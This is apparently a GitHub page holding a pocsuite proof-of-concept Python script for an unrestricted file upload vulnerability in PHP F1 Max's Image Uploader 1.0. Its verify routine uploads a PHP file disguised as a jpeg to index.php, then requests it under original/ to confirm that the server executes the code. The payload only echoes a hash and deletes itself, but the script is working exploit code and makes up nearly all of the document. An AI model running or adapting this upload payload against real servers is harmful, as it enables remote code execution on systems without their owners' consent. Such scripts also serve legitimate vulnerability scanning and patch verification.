-
Notifications
You must be signed in to change notification settings - Fork 52
/
Copy pathMax's Image Uploader Shell Upload Vulnerability.py
executable file
·66 lines (51 loc) · 2.12 KB
/
Max's Image Uploader Shell Upload Vulnerability.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import urlparse
class TestPOC(POCBase):
vulID = '67514' # ssvid
version = '1.0'
author = ['hfloveyy']
vulDate = '2010-01-26'
createDate = '2015-12-08'
updateDate = '2015-12-08'
references = ['http://www.sebug.net/vuldb/ssvid-67514']
name = 'Max's Image Uploader Shell Upload Vulnerability'
appPowerLink = 'http://www.phpf1.com'
appName = 'PHP F1 Max's Image Uploader'
appVersion = '1.0'
vulType = 'File upload vulnerability'
desc = '''
PHP F1 Max's Image Uploader 1.0版本的maxImageUpload/index.php中存在无限制文件上传漏洞。
当Apache未被设置来处理具有pjpeg或jpeg扩展名的拟态文件时,远程攻击者可以通过上传具有一个pjpeg或jpeg扩展名的文件,执行任意代码,并借助对original/的一个直接请求来访问该文件。
'''
samples = ['127.0.0.1']
def _attack(self):
result = {}
#Write your code here
return self.parse_output(result)
def _verify(self):
result = {}
testurl = urlparse.urljoin(self.url, '/maxImageUpload/original/1.php')
vulurl = urlparse.urljoin(self.url, '/maxImageUpload/index.php')
payload = {'myfile':('1.php','<?php echo md5(0x2333333);unlink(__FILE__);?>','image/jpeg')}
data = {'submitBtn':'Upload'}
req.post(vulurl,files = payload,data = data).content
resp = req.get(testurl)
if '5a8adb32edd60e0cfb459cfb38093755' in resp:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload
#Write your code here
return self.parse_output(result)
def parse_output(self, result):
#parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)